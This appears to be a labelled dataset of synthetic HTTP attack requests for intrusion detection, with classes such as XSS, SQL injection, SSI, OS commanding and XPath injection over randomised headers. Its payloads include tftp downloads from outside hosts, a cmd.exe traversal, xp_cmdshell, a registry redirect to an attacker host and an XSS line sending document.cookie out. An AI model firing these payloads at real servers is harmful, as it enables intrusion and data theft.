class: XPathInjection
GET /abVT7G09Tnp/nOuGXdCOBdocument/EH/qseib/3rpEls1wy/1o881n21iNsLGkE/luGdr.php4?edotm=ck&3A5EHrx=tpneESg49&BAdc=Oen90&QLunion2=2o8nltbin+edocumentWe4r&io53lctts33=e0umne%27%5D++++%7C+++P++++%7C+++%2F%2Fuser%5B++name%2Ftext%28++%29+++%3D++++%27pf&hPrn4hdsbhigmql=%29hpavari9tuto7s9%27d&7IbqEcU=9m9 HTTP/1.1
Host: 194.65.253.8
Connection: keep-alive
Accept: text/*;q=0.0, text/*
Accept-Charset: x-mac-japanese;q=0.9, x-mac-ce, iso-8859-15;q=0.7, iso-8859-6, hz-gb-2312;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 49.61.235.194
Cookie: airovEi2bi=eoSK;ciIleii4=49821
Cookie2: $Version="33"
Date: Mon, 27 Mar 06 04:00:29 CET
ETag: "t_wbub8hlouKz7ojG"
Expect: 100-continue
From: iinongn@mnxs.it
If-Modified-Since: Wed, 07 Mar 07 20:07:30 CET
If-Unmodified-Since: Thu, 02 Mar 06 22:14:27 CET
If-Match: "APQ6Ske@TeuPoC.3I"
If-None-Match: "3v1xc3Y@aP5V96lDrok"
If-Range: "Hht5g1_0RxjQCKvG9"
Max-Forwards: 0
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: yeerry vuplo=4rasqRlo
Authorization: Basic dTBzcmJsc2I6dHdzYXRy
Range: -2670
Referer: /adjsBe.wav
TE: chunked
Trailer: If-Match
User-Agent: spoHomglYdltehtdkaf
UA-CPU: MIPS
UA-Disp: 065,1900,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 0640x829
Via: 3.1 246.10.66.139, 9.1 www.czdEgl.html, 0.0 www.99Iat.tiff
Transfer-Encoding: compress
Upgrade: Ewf/6.2, nem/5.8, anr/8.4
Warning: 080 www.ciitli.js "trbebkrzcma82" "Tue, 16 Jan 07 01:29:35 GMT"
X-Forwarded-For: 29.255.158.60
X-Serial-Number: 91085998772983
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48786
Start - Id: 39725
class: SSI
GET /bYV/spYhpOd6gdkrG0M1Y/cV8vQ@tXsUaJVYi/tmdertnyanD4ott/6kpE4Yw6aFcs/sc.jpg?Hof641=ow5+locationznon%29anNietc&uegslwf=529335375&mtkttuehv=%3C%21--++%23include+virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+++--%3E HTTP/1.1
Host: 236.230.220.34:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: macintosh;q=0.6
Accept-Encoding: identity;q=0.6, compress;q=0.8, deflate, compress;q=0.4, gzip;q=0.2
Accept-Language: oil-adth
Cache-Control: only-if-cached
Client-ip: 55.223.250.116
Cookie: ktnna=5@JHgyCGc
Cookie2: $Version="346"
Date: Wed, 09 Dec 09 22:26:16 CET
ETag: "S3drG_PYWSBZhlFGgd0W"
Expect: 100-continue
From: iltkt32@r7Muj.it
If-Modified-Since: Tue, 23 Aug 05 15:39:37 UTC
If-Unmodified-Since: Thu, 07 Apr 05 22:40:07 CET
If-Match: "OYBriI2wnOBw8UzR"
If-None-Match: *
If-Range: Sun, 23 Jul 06 14:20:41 CET
Max-Forwards: 379
MIME-Version: 4.8
Pragma: nh9eh=aWi
Proxy-Authorization: Digest nc=CBADdAaC
Authorization: dhunde arei=t1Ootwe
Range: -58,-7,-12255
Referer: /je7t/rodt4/aosgmb/u65zne/hhiS39w8.nsf
TE: trailers,gzip,chunked;q=0.3
Trailer: Host
User-Agent: Mozilla/5.4 (X11; U; Unix 4.9; te-oi; rv:8.9.6) Gecko/48522793
UA-CPU: x86
UA-Disp: 035,2744,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 066x3039
Via: FTP/2.7 www.wdoRn9oC.html, FTP/8.2 116.1.185.164:2, HTTP/0.9 www.Rrhnrr.jpg
Transfer-Encoding: compress
Upgrade: asg/6.6, aeyyeD/5.2, eeae/5.5, sfi/1.0
Warning: 957 www.4Ggtd.jpg "toiUl7sojbevrsrhed" 
X-Forwarded-For: 51.221.13.87
X-Serial-Number: 9911764547155
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39725
Start - Id: 43532
class: OsCommanding
GET /gdTadroIZel/mvzjgaP8wP/enntantr/in7tu/dhtdnt3g1nroeNhMidm4/aailwi.dll?nR1WVzstdintbodyUb=%27%3B++++tftp++++-c++get++www.asennsisll.com%3A%2Fnt.tar&ONsWa3lhf7ne9=rarQexse&ultc=dn%5Dp&oltieiJ=i+ilnwsecae++replacer3passwd HTTP/1.1
Host: www.tbye6Agson.be
Connection: close
Accept: application/*;q=0.8, image/gif;q=0.0, audio/*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 214.70.1.175
Cookie: Eit=a3be;abembp=sock_streamuobr
Cookie2: $Version="43"
Date: Tue, 31 Mar 09 17:50:34 CET
ETag: "UWHJUoWEjR@OONOXor"
Expect: hhdoic
From: se0nS@elUienypa.de
If-Modified-Since: Thu, 03 Mar 05 02:41:30 UTC
If-Unmodified-Since: Tue, 02 May 06 20:24:44 CET
If-Match: *
If-None-Match: "8ghp6dkd5PT6QcxKx3jU"
If-Range: "a7u6-YCtucnI9pfpAV4n"
Max-Forwards: 468
MIME-Version: 8.9
Pragma: renh6='EEo'
Proxy-Authorization: Basic c2NndDpFRWhiaHQ0
Authorization: Digest qop=auth
Range: -983461,45-31195
Referer: http://www.rA9gK.de/oe3edbeN/ono9e/ntnd/r16o.mpeg
TE: chunked,deflate;q=0.9,trailers
Trailer: Expect
User-Agent: Mozilla/0.3 (X11; U; Linux i586 5.1; po-1r; rv:6.4.3) Gecko/09169251
UA-CPU: PowerPC
UA-Disp: 230,276,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 135x815
Via: HTTP/9.7 www.ere5A.jpg
Transfer-Encoding: deflate
Upgrade: hlpxo/5.8, ate/4.1, k9h/8.3, atf7/2.6
Warning: 755 www.rpcofa7.png "taotesry9p" 
X-Forwarded-For: 118.79.162.108
X-Serial-Number: 00610632074
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43532
Start - Id: 39167
class: SSI
GET /iDG-U4Y_nt/E3yhaeie3Y/UK/3yIf5s/ddSre/auhcelds/sut3.htm?abmoi=fmh%3Ete&tr1=tfZ8DG_MiYb3&9mnpt5twhtylw=rtal&sryo4tpns=hd&daosmTdNWatA1=082590&nrstdki0enbl=mkggup6C&oRwOs=447 HTTP/1.1
Host: www.lii05a.be
Connection: close
Accept: */*
Accept-Charset: hz-gb-2312, cp-936, iso-2022-kr, x-mac-arabic;q=0.7
Accept-Encoding: gzip;q=0.3, deflate
Accept-Language: *;q=0.9
Cookie: pepo=dlsdhgnatoaxml;a6oer83t0hm=smnb;ghtnuafoEnfrr=992680;paW8esgestadt=20nut1kee5fsoae;Rr6adEtm=<!--#echo var="date_gmt"-->
If-Match: *
Max-Forwards: 977
Authorization: Basic c2N0UzU6anRoZQ==
Referer: /6e9mof.bin
User-Agent: Mozilla/6.8 (Machintosh; U; Mac OS X 4.0; tu-eo; rv:2.4.5) Gecko/17770644
UA-Pixels: 263x7301
Via: 3.1 www.5hqo.html, Wousr/1.9 40.252.89.212:39105

null

End - Id: 39167
Start - Id: 39977
class: SSI
GET /fv1Jformf2/t2zab0qdOq/yautoexec9RYN.FW5HSV53/i5nbehe3m/styleJ.2tiframehdivB8update/rfznd3iege9sshd/lodjKp.6FwUBM@lP/w9paerbt/Aa.css?eemsthtbdta=ne%7Cmepeudocumentaxbin%25WrE&hgpshhachswhq=eMg&yt=b.IK6%40S&eieOeesfma=pslrdw&ahcto2rapiehoi2=9626277&aw04eF=mconnect&K0oemdAw9opE=rontieeu&ow=53&Oiednf=ehinwasgei&4ec=%3C%21--+%23exec+cmd%3D%22%2Fbin%2Fls+-l+++++%2Fhome%2Fhte%2Fluonewla%22+--%3E&iypdnr=cmdmh&ausUtToeyd=n%2BSspI+fe9a%28cl&grr0t=27263719&xrtesrShwt9hOmY=rjon&aonbebskc=ad0h0mun%2F8ehda HTTP/1.0
Host: www.tIae.ch
Connection: eesi4veg
Accept: */*
Accept-Charset: x-mac-greek, iso-8859-8-i, gb2312
Accept-Encoding: compress, deflate;q=0.8, deflate, identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 82.49.151.0
Cookie: ow=anr;twase6didln=9sMi;sacbfseep=oiaba&http>os2g;ftP9Yiiu3=27867970;cloetsb=te08oo;DBRe=371
Cookie2: $Version="35"
Date: Tue, 29 Dec 09 02:10:43 GMT
ETag: "syLbFXo8hSf7y.nXN"
Expect: 100-continue
From: 55otlh@iiee8isnew.gov
If-Modified-Since: Fri, 18 Sep 09 03:37:33 GMT
If-Unmodified-Since: Mon, 09 Jul 07 03:36:18 UTC
If-Match: "u1YdDrP@zSHRr3Q"
If-None-Match: *
If-Range: Fri, 23 Jan 04 06:53:55 CET
Max-Forwards: 3769
MIME-Version: 9.7
Pragma: 0e='tM'
Proxy-Authorization: aHtMee s2lgu=6eHelq
Authorization: NTLM ZW9lYWVoY0NQYm9pRWlBYmhzaXNlaGRPb3RkWDhvaGVpZXdVcnlleHRl
Range: -038647,3950-886928
Referer: http://e7ms5N.com/acee/erneEsmr/niimnroo/haae.mp3
TE: trailers,chunked;q=0.7
Trailer: Transfer-Encoding
User-Agent: tutllwtien
UA-CPU: Sparc
UA-Disp: 8616,110,16
UA-OS: WinNT
UA-Color: color16
Via: 0.6 www.Atm9mr3.jpg, 6.1 85.88.18.224
Transfer-Encoding: compress
Upgrade: eto/0.2, rok/5.4, dgyt4O/7.3, hii8/8.4, hooeh/2.3
Warning: 323 13.31.57.254 "dinvatrVko1snr" 
X-Serial-Number: 754321
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 39977
Start - Id: 47122
class: XSS
GET /ebm3iJYJe/TedntsefaE1r/Eseerxta5/RnUincludeIGg/t4GLm1hKfV43tVGvjx/x0lyXEfO/2DJMp@XmrQWz0/odRtKmigroxk/aCG3VcSwAgJon.htm?cju1ahiEcthe0=nRburnqevonona&J-wlib@49uuT=2rt&aa6e8uryd=hac3ilgwhaedo&Hj2vf8r=19310&gaieSnpdeehrho=%3C%21%5BCDATA%5B%3C%21--%5D%5D%3E%3Cscript++++%3E%5Balert++%28%27te%27%29%3B%5D%2F%2F--%3E%3C%2Fscript+++%3E HTTP/1.1
Host: 202.174.230.80
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 1-tetyaqn, nn-wtt1ne, scrhsir6-lzrhedh, ta-io2tc;q=0.4
Cache-Control: czpzr=Tr9nnm
Client-ip: 111.27.185.154
Cookie: cqaatOxeanise=b letnstdin;gJid7MQ4ixO=tphmsnNwtyrriwen0;Aaby=idocument4&do<>~;t2sosyxnEsu6dd=oo~oitrDeaeri;hk=nmght;bs7nsiasssb=wiseeew-xtermlareeSkatw
Cookie2: $Version="7"
Date: Wed, 26 Jan 05 17:01:21 CET
ETag: "mQNu2WqrXNJIUGh7"
Expect: 100-continue
From: dy0mird@eelb.it
If-Modified-Since: Mon, 05 May 08 16:20:41 UTC
If-Unmodified-Since: Sun, 21 May 06 20:33:50 UTC
If-Match: *
If-None-Match: *
If-Range: "pkvVXtr2O-4U7WTH"
Max-Forwards: 0
MIME-Version: 5.8
Pragma: ghnp2d='dau'
Proxy-Authorization: Digest qop=auth
Authorization: mSft3 s4g9r=z6stJon6
Range: 38-13,-4
Referer: http://6eeoi.net/os85aom/briesbia/0adOh.js
TE: deflate
Trailer: Via
User-Agent: 0raatTlt (iRP5_qSTHx)
UA-CPU: 68000
UA-Disp: 016,6175,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7372x166
Via: HTTP/3.3 www.ggoa.css, 7.8 www.c5erhzje.gif
Transfer-Encoding: compress
Upgrade: pen/9.1, ccf/6.5
Warning: 236 www.awsdo.css "gdocuisscirL" "Fri, 28 Dec 07 18:21:26 UTC"
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 2379709487507553302
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47122
Start - Id: 36415
class: OsCommanding
GET /lyr/vV.swf?9nya1=9i&eawtink=aestlocation0du%24du%3Amleoj+c&%ugDFv8DUSXT=%27%3BEXEC+master.dbo.xp_cmdshell+%27cmd.exe&4apsogoanMsf=yEr+group+byry1m%5DLh9&f7eraea7nos45ii=m&6rbfsHye=rQQBV7&y-ipxmlVnX=lineloOrvhEeodsdo&2nii1ortdenoE=sx6tRtmQEdtoeAlRsN&slUdT=955&t6g3el=2ee HTTP/1.1
Host: www.nh79.ch
Connection: yHdn8i
Accept: */*;q=0.0
Accept-Charset: x-mac-korean;q=0.4, euc-kr;q=0.1, x-mac-hebrew, utf-8, utf-8
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: min-fresh=5959
Client-ip: 133.214.196.239
Cookie: jprocessing-instructionG3.QKWNunioniS=me 8corEnetp
Cookie2: $Version="16"
Date: Tue, 25 Mar 08 19:55:38 UTC
ETag: W/"Zs1kA2sdnln57Kh"
Expect: 100-continue
If-Modified-Since: Sat, 01 Oct 05 09:54:40 UTC
If-Unmodified-Since: Tue, 30 Jan 07 20:09:09 CET
If-Match: "qQ7FUbjuRYoA3.xk@vHL"
If-None-Match: "fSPHXRMjPU.XynlmrRPs"
If-Range: "KgjMH2dZUc13@9G77g-"
Max-Forwards: 2
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: NTLM dW56NWF1ZWVsdGE1aHJpb3NzZTN1cmhudGlvTnRpbnNhb3F0U3hvZXRmbUk=
Authorization: ibeszs htdiuh=Ss4i
Range: 15-,7348-823
Referer: /Ih6nae/hxnni/viae.sh
TE: trailers,gzip;q=0.7
Trailer: Referer
User-Agent: 3TsbIrhbrtvrm
UA-CPU: PowerPC
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 811x0670
Via: HTTP/4.5 www.Ni92.tiff, 5.6 www.tSmnota.js, eah/0.9 www.tooe.css
Transfer-Encoding: gzip
Upgrade: ehax/0.1, twoX/5.2, amhin/1.7, Nyuis8/4.4, rta/1.3
Warning: 271 125.50.84.12 "ieans4Sb3nfr1aNeeTba" "Fri, 16 Dec 05 02:23:13 UTC"
X-Serial-Number: 492730775848
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36415
Start - Id: 47271
class: XSS
GET /5KQ/qhqO1ByBz/ebyfaott/eQlg9GvT/sO7eAYqP5/hEqAy/a5vcvnNngM91/d2a1ohniwYrPqd/da8/ohyHp2er68eraNhtGs.shtml?tGiiazsu9oz=%3C%3Cscript++%3E%5Balert++%28%27axa0d2ou2n%27%29%3B%5D%3C%2Fscript+++%3E&kaute=618 HTTP/1.0
Host: www.hawVib.biz:80
Connection: keep-alive
Accept: text/*
Accept-Charset: iso-2022-kr;q=0.7, koi8-r, euc-kr, gb2312
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 10.37.184.28
Cookie: 72.Kqb-5G=as5Ssh
Cookie2: $Version="51"
Date: Sun, 14 Mar 04 10:47:19 UTC
ETag: W/"@N7GG..KkIBBJaTNB"
Expect: ntthjebs
From: mrdmtn@ziesi15.ch
If-Modified-Since: Tue, 20 Oct 09 17:29:39 UTC
If-Unmodified-Since: Wed, 26 Nov 08 04:53:56 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2336
MIME-Version: 3.6
Pragma: Osfn=lyfaEn
Proxy-Authorization: Digest nonce
Authorization: Basic T2V3bmthbjpMZ2kxZmE=
Range: 3-25949,-0524
Referer: /rihbt/Nrca/bSoohin.pdf
TE: gzip,chunked;q=0.8
Trailer: Trailer
User-Agent: u48E2y1oj http://www.efraIte.net
UA-CPU: x86
UA-Disp: 263,853,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 753x7661
Via: 2.6 www.uet5U.js
Transfer-Encoding: gzip
Upgrade: 2gkxie/3.5, ehnI/4.4
Warning: 816 www.tnnynhia.jpg:19076 "wwNrihTcIteeag" "Sat, 20 Oct 07 01:41:20 GMT"
X-Forwarded-For: 228.59.131.84
X-Serial-Number: 15152704800
----: ----------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47271
Start - Id: 41060
class: SqlInjection
GET /rlc@/i7yDCodEUoj30/Elszbo/fnT7cL.PH/ixzmzSOzpeiam67fm5Vy/FXC/s9fvFAV8pEV5n/ljetN4Ety5etOmltmpe/uPvtKLJIFx6BJwbN.P9r/sx@5TSB8EDfJUUvx.jpg?hext=Hwg&etnlcme=s%3Asp&eclD0=nRlk5lWrW&os3DfyQnsDue0bd=exec+xp_regwrite++++%27HKEY_LOCAL_MACHINE%27%2C%27SOFTWARE%5CMicrosoft%5CMSSQLServer%5CClient%5CConnectTo%27%2C%27af%27%2C%27REG_SZ%27%2C%27DBMSSOCN%2Chackersip%2C80%27 HTTP/1.1
Host: 22.44.176.110
Connection: close
Accept: */*
Accept-Charset: cp-950;q=0.4, euc-kr;q=0.9, shift_jis;q=0.2, iso-8859-3;q=0.4
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 111.62.79.6
Cookie: enkaRuuaukaa=3279792;Lsnna2oo351su=hff$;bEor3ierolds=emag]ssew;eIiczhe9=gidereecxta0e7sl;oeewzeflgzcasc=passwd5e9ejEi0Ocftpn;2ectur=tvCf7lToHux
Cookie2: $Version="635"
Date: Sun, 29 May 05 16:07:43 CET
ETag: "ZF70eBKRZsZqsOka"
Expect: ttrhbztf
From: 4a4Ax80@ieieio.ch
If-Modified-Since: Thu, 01 Mar 07 07:36:18 CET
If-Unmodified-Since: Sat, 16 May 09 05:12:53 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 21 Feb 05 05:10:47 CET
Max-Forwards: 39
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM c3RhdnNuaU9hMWF0VHRnczFzMTF0N29wZWl4d2NlTG5ubg==
Authorization: Digest nc=EcCfCeEE
Range: 7-04,570-
Referer: /cAesp1ge/anttrE/auitG.php4
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/4.6 (Machintosh; U; PPC Mac OS X 2.1; ef-fy; rv:2.3.5) Gecko/03986244
UA-CPU: PowerPC
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 967x915
Via: FTP/6.2 www.4eehn.js:05626, 4.6 94.209.235.135, 7.8 www.gdfi.htm
Transfer-Encoding: identity
Upgrade: uohtr/6.5, oeo/0.4
Warning: 051 www.iztpe.htm "idahee" "Thu, 26 May 05 08:46:17 UTC"
X-Forwarded-For: 57.95.233.202
X-Serial-Number: 54708069609443708
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41060
Start - Id: 48216
class: XSS
PUT /ikvEkjR-Bjp7Hf_2e/xnXG0dkI9/oPHQhJCjej_n.msf? HTTP/1.0
Content-Length: 277
Content-Language: zoEo,anet
Content-Encoding: gzip
Content-Location: /n2irToeo/a3ddip3/tTejcte/burno.mpeg
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 05 Dec 09 06:43:16 GMT
Host: www.Tucpn.be:98
Connection: 3ihe4c8l
Accept: video/mpeg;q=0.6, video/*;q=0.5, text/*
Accept-Charset: koi8;q=0.2, ks_c_5601-1987;q=0.9, x-mac-chinesetrad;q=0.8
Accept-Encoding: <input    type  = "image    "  dynsrc  = "   javascript: [alert('h4ej3');]  "    >
Accept-Language: <a   href  =   "   about:<s&#99;ript   >[window.open('http://42.178.250.207/ri.exe'+document.cookie);]</script  >     " >
Cache-Control: only-if-cached
Client-ip: 102.28.176.12
Cookie2: $Version="426"
Date: Mon, 14 Mar 05 17:01:50 GMT
From: mcitnbOr@s4Xde.gov
If-Modified-Since: Fri, 02 Apr 04 21:55:53 CET
If-Unmodified-Since: Sat, 26 Feb 05 01:12:19 GMT
If-Match: "pjYPo@8O0.fz47-LD"
If-None-Match: "2CKxIJxA7Zi6QnuM9@A"
Max-Forwards: 822
Pragma: woeYnu='5geihd'
Proxy-Authorization: Basic YWVhdHRxZzphc2ViaQ==
Authorization: eiheo htnv=doAtceb
Range: 3713-
Referer: /t7odeeT/toPo/oezm.pl
Trailer: Accept-Charset
User-Agent: Mozilla/2.5 (compatible; MSIE 4.9; SunOS sun4u; g0bo)
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 7334x400
Via: 1.5 24.145.44.19, FTP/3.6 www.rsrvnt.css, 4.5 219.11.63.145
Transfer-Encoding: deflate
Upgrade: eremce/4.3, xnzi/0.6, 6tgf/7.0, eal3Sa/3.7, tio/8.3
----: -------------------------

cZeeuA8u=txp&2irOzsilhhdni=gewi&e4SrtkiEE=s4 asnjxmlw-rwnecftn&ewavF=0oalPj2vIUMV&f3n8eme=3&Atd6mPaopt.6=wr /anl n &hsahMtPieen=piagadn9sh&Dem3mtm=t@morS&fiiuArm=eBKh&pg.F6LL=h8eaeirRgomo&rrrradm=1veo0eedoargd&tpaoirNtlxo7n=56&rld=rwindow.open&tskebhwtlet=2190&ntn=79421172

End - Id: 48216
Start - Id: 48122
class: XSS
GET /1ueetyzishbatlawhrH/2t8P_DTajY/acjXs@1/cY/yha9keeh5nuwtd8ykrc/jeikIIywVhoqz75X/hxxrfrpx@e/i@EUF7Y-WB/6recy/ml_0/mnORsW.asmx?Wmbrolulwte=%26%7B%5Balert++%28%27eeTwim%27%29%3B%5D%7D%3B&egopAfis=rue%7Ctuiercja&xMvxatmp8=64861&shfn7Eeb=0857540&iafOesrlatsRkaT=An%3D+a&uufiaco=tmpFzr HTTP/1.0
Host: 167.99.126.207
Connection: keep-alive
Accept: text/*;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 193.109.62.83
Cookie: 0NQGchild4pm_G=tt;ok=97;peoISg=260;0XUmailE1cuqinclude=dbt  I=
Cookie2: $Version="47"
Date: Sat, 19 Mar 05 02:15:34 GMT
ETag: W/"MCOhL0U7dc0.h29B"
Expect: 100-continue
From: bnwioIhh@fnmcaAYfe6.de
If-Modified-Since: Wed, 11 Feb 09 19:39:31 GMT
If-Unmodified-Since: Thu, 21 Jun 07 06:34:24 UTC
If-Match: "WlgHts13DlvSAD08T"
If-None-Match: *
If-Range: *
Max-Forwards: 60
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: ehtw2 teSjse=oaotilii
Range: 223086-98
Referer: http://eteSr.it/esaniio/Sdqlg/py2ku.txt
TE: deflate,trailers,trailers
Trailer: User-Agent
User-Agent: neOosthiro (tZT9.uHVTQ; tQlVwoxv; hkWz2S@Ks; dHqevEcpE)
UA-CPU: Sparc
UA-Disp: 121,8495,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 6001x2247
Via: 2.0 www.eLgo.html, 3.6 65.53.57.164:4893, 3.0 253.247.158.124:15
Transfer-Encoding: identity
Upgrade: paleei/6.9, pyefh/6.3, aeu/0.2
Warning: 668 168.38.49.39 "rrsFr0irpvtbsQzh0o" 
X-Forwarded-For: 72.155.7.72
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48122
Start - Id: 44154
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.1
Host: 98.110.246.181
Connection: close
Accept: audio/basic;q=0.8
Accept-Charset: windows-1253;q=0.1, iso-8859-8;q=0.1, iso-10646-ucs-2;q=0.6, x-mac-korean;q=0.0, iso-8859-6;q=0.8
Accept-Encoding: 
Accept-Language: gndsnerp-ebn, n6e1f-7nav;q=0.7
Cache-Control: min-fresh=14
Client-ip: 5.92.107.40
Cookie: 6lbe4=scopy telnetqg(
Cookie2: $Version="971"
Date: Sun, 22 Jan 06 07:32:09 UTC
ETag: W/"MsiFE@faBgslkNVRQxH"
Expect: wzoajpob=ltbiem;tOrhtt7
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Sun, 11 Apr 04 11:03:47 UTC
If-Unmodified-Since: Thu, 04 Mar 04 10:05:26 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 28 Nov 04 07:58:01 GMT
Max-Forwards: 9225
MIME-Version: 7.5
Pragma: l2='nndRc'
Proxy-Authorization: Digest realm
Authorization: Digest realm
Range: 815-,644-20793
Referer: http://jreu1e.de/lddawgso/xnnser.tiff
TE: trailers,trailers,gzip
Trailer: Accept-Charset
User-Agent: Mozilla/6.6 (X11; U; Linux i386 3.4; 9t-eE; rv:4.7.8) Gecko/63392801
UA-CPU: Sparc
UA-Disp: 7825,945,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 5788x525
Via: 8.1 186.131.16.222:13, FTP/2.1 166.88.243.107
Transfer-Encoding: t7vDlt
Upgrade: elepej/6.1, assl/9.6, tHws/5.5
Warning: 315 250.26.253.55 "aaeakdwosbfa" "Wed, 07 Apr 10 16:10:50 GMT"
X-Forwarded-For: 122.146.226.211
X-Serial-Number: 008751
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44154
Start - Id: 49375
class: XPathInjection
GET /9nhSae3oiie/eetscorhtaTjs/onxumoE1Didbnshe/hhsboejeY.shtml?23wltlhMi=7293&tuuuechnagre=e7nm%3Eriw0t&tue0lnpa2bpbfna=8&ynutze4atithie=autoexecprocessing-instructiongt&hedChSeoJDuiti=7989&hHmdtduanpNr0=6ttmi%27+or++6+++++%3C+count%28path%2Fchild%3A%3A*%29+++or+++++%27tat%27++++%3D++++%27&gant3=5c7pRirAvi8t0&ezehilcr8e3vpi=05882&vbscript_eC9uSiframe0ui=p-dP0qc6wJ5T&Mddp=1c0evwtfroR%40m&Q00F3e-=eici&pgescyyDau9t=eiSHeeedAo&isheiy9rcjd=3965&eBsc=77 HTTP/1.0
Host: 235.63.18.58
Connection: close
Accept: */*;q=0.7
Accept-Charset: iso-8859-8-i
Accept-Encoding: identity;q=0.5, gzip, gzip
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 242.216.253.161
Cookie: vT12=eao;1rdmihelR=skUtfOcTg
Cookie2: $Version="951"
Date: Fri, 03 Nov 06 18:24:08 UTC
ETag: "8EMWsrpgGBvHJnZ9p9om"
Expect: mty5e=eh9oea;ie4est=etebu
From: hzioi@etsrec.cz
If-Modified-Since: Fri, 06 Oct 06 12:11:39 UTC
If-Unmodified-Since: Mon, 09 Jan 06 13:31:59 CET
If-Match: *
If-None-Match: "M1MpuoxosCLLPZJ7y"
If-Range: Thu, 07 Jul 05 18:15:28 CET
Max-Forwards: 1
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: gWoe no1msa3=apmn
Authorization: Basic YWhvM2p1c2w6c2JjZ3Ew
Range: 79-,-25900
Referer: /han8fsea/msymswe5/ir2n0/lyuni4jN.cgi
TE: chunked
Trailer: Pragma
User-Agent: Mozilla/4.1 (Windows; U; Windows NT 9.6; st-ah; rv:1.7.6) Gecko/73921509
UA-CPU: StrongARM
UA-Disp: 129,1543,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 0695x2392
Via: 6.9 www.fp7naYe.png, FTP/6.3 www.nrviim.html, pike/0.2 95.107.182.137:68
Transfer-Encoding: identity
Upgrade: peor/1.1, d2rrnr/4.2
Warning: 392 www.dbtno.css:44727 "hesiano" "Sat, 28 Jan 06 05:38:19 UTC"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 68426632486242488
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49375
Start - Id: 48440
class: XPathInjection
GET /tb5ug/yepQJSQxelGce9M/wa.mRpdx_BTb/0ax0DYC-42sB-cK.php3?hT0=yrulodesaeuiwc&r5GRSkcR9=a9%7C7i2mlikevbscriptz%3AhwA&lilwrFneWsyrhfu=8&redraRrh=+nwtinsert%26g%5DncebwayeL&Mfs0dFHde=0399&Fe5i=64120&6eprjirevsreo=+psf73elrn&ntytmpqs7=aetegilocation+Mso HTTP/1.1
Host: www.8hRk3n3.be
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: y='iotGg'
Client-ip: 160.236.211.26
Cookie: ieelsrcner=82690452;mobNznhBo1oDup=248437;yC=um/0h/wx/child::node()[ position()=6]     |     I/tn9t/5ere/child::text()[position()=8]   or    '5e8dEmc' =';muedouD=g]eru;zRePsmii7jttf=gqaei
Cookie2: $Version="0"
Date: Wed, 26 Mar 08 03:01:14 CET
ETag: "QF5oOBRPWk@R1BG"
Expect: sidisrac=pr0iinnu;51o4t
From: tzeeyyn@tbckkmdmi.st
If-Modified-Since: Mon, 15 Jun 09 13:31:06 GMT
If-Unmodified-Since: Thu, 08 Nov 07 19:03:46 GMT
If-Match: ".D8xdomO_8a34dG"
If-None-Match: "Ui3nsCwo4SRJGXS"
If-Range: Tue, 27 Jan 09 04:50:56 CET
Max-Forwards: 579
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: csh5 e7oha=vom3a6n0
Authorization: Digest algorithm=MD5
Range: 91336-,-23681,1-84677
Referer: http://www.n0owuha.ch/pe95ttt/nsneu.asp
